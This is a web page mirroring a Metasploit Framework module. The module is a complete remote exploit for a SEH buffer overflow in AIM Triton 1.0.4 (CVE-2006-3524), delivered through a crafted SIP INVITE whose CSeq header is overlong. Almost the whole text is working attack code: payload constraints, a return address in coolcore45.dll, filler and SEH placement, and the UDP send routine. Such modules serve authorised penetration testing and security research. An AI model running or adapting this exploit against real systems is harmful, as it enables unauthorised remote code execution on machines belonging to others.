Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/sip/aim_triton_cseq.rb
19850 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GreatRanking
8
9
include Msf::Exploit::Remote::Udp
10
include Msf::Exploit::Remote::Seh
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'AIM Triton 1.0.4 CSeq Buffer Overflow',
17
'Description' => %q{
18
This module exploits a buffer overflow in AOL\'s AIM
19
Triton 1.0.4. By sending an overly long CSeq value,
20
a remote attacker could overflow a buffer and execute
21
arbitrary code on the system with the privileges of
22
the affected application.
23
},
24
'Author' => 'MC',
25
'References' => [
26
['CVE', '2006-3524'],
27
['OSVDB', '27122' ],
28
['BID', '18906'],
29
['ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER],
30
['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION],
31
['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE]
32
],
33
'DefaultOptions' => {
34
'EXITFUNC' => 'seh',
35
},
36
'Payload' => {
37
'Space' => 400,
38
'BadChars' => "\x00\x0a\x20\x09\x0d",
39
'StackAdjustment' => -3500,
40
},
41
'Platform' => 'win',
42
'Targets' => [
43
[ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll
44
],
45
'Privileged' => false,
46
'DisclosureDate' => '2006-07-10',
47
'DefaultTarget' => 0,
48
'Notes' => {
49
'Reliability' => UNKNOWN_RELIABILITY,
50
'Stability' => UNKNOWN_STABILITY,
51
'SideEffects' => UNKNOWN_SIDE_EFFECTS
52
}
53
)
54
)
55
56
register_options(
57
[
58
Opt::RPORT(5061)
59
]
60
)
61
end
62
63
def exploit
64
connect_udp
65
66
user = rand_text_english(2, payload_badchars)
67
port = rand(65535).to_s
68
filler = rand_text_english(792, payload_badchars)
69
seh = generate_seh_payload(target.ret)
70
filler[780, seh.length] = seh
71
72
sploit = "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
73
sploit << "To: <sip:#{rhost}:#{rport}>" + "\r\n"
74
sploit << "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
75
sploit << "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
76
sploit << "Call-ID: #{(rand(100) + 100)}#{rhost}" + "\r\n"
77
sploit << "CSeq: " + filler + "\r\n"
78
sploit << "Max-Forwards: 20" + "\r\n"
79
sploit << "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"
80
81
print_status("Trying target #{target.name}...")
82
83
udp_sock.put(sploit)
84
85
handler
86
disconnect_udp
87
end
88
end
89
90